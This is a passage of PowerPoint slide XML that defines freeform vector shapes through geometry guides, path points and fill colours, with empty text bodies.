        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10379" name="Freeform 460"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1389062" y="6483350"/>
            <a:ext cx="366713" cy="122238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 162"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T2" fmla="*/ 0 w 162"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T33" fmla="*/ 0 h 54"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T68" fmla="*/ 0 w 162"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 5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2"/>
              <a:gd name="T106" fmla="*/ 0 h 54"/>
              <a:gd name="T107" fmla="*/ 162 w 162"/>
              <a:gd name="T108" fmla="*/ 54 h 5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2" h="54">
                <a:moveTo>
                  <a:pt x="0" y="17"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10380" name="Freeform 461"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1755775" y="6470650"/>
            <a:ext cx="128587" cy="58738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T5" fmla="*/ 0 h 26"/>
              <a:gd name="T6" fmla="*/ 0 w 57"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T8" fmla="*/ 0 w 57"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 60000 65536"/>
              <a:gd name="T16" fmla="*/ 0 60000 65536"/>
              <a:gd name="T17" fmla="*/ 0 60000 65536"/>
              <a:gd name="T18" fmla="*/ 0 w 57"/>
              <a:gd name="T19" fmla="*/ 0 h 26"/>
              <a:gd name="T20" fmla="*/ 57 w 5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7" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10381" name="Freeform 462"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1414462" y="6219825"/>
            <a:ext cx="73025" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T15" fmla="*/ 0 h 124"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T17" fmla="*/ 0 h 124"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T19" fmla="*/ 0 h 124"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T21" fmla="*/ 0 h 124"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T23" fmla="*/ 0 h 124"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T32" fmla="*/ 0 w 32"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T34" fmla="*/ 0 w 32"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 1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
              <a:gd name="T106" fmla="*/ 0 h 124"/>
              <a:gd name="T107" fmla="*/ 32 w 32"/>
              <a:gd name="T108" fmla="*/ 124 h 1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 h="124">
                <a:moveTo>
                  <a:pt x="32" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10382" name="Freeform 463"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1417637" y="6224588"/>
            <a:ext cx="60325" cy="234950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 0 h 104"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 0 h 104"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 0 h 104"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 0 h 104"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 0 h 104"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 0 h 104"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 0 h 104"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T32" fmla="*/ 0 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T34" fmla="*/ 0 w 27"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T36" fmla="*/ 0 w 27"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 1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
              <a:gd name="T106" fmla="*/ 0 h 104"/>
              <a:gd name="T107" fmla="*/ 27 w 27"/>
              <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10383" name="Freeform 464"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1420812" y="6226175"/>
            <a:ext cx="50800" cy="190500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T13" fmla="*/ 0 h 84"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T15" fmla="*/ 0 h 84"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T17" fmla="*/ 0 h 84"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T19" fmla="*/ 0 h 84"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T21" fmla="*/ 0 h 84"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T23" fmla="*/ 0 h 84"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T25" fmla="*/ 0 h 84"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T32" fmla="*/ 0 w 22"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T34" fmla="*/ 0 w 22"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T36" fmla="*/ 0 w 22"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T38" fmla="*/ 0 w 22"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 22"/>
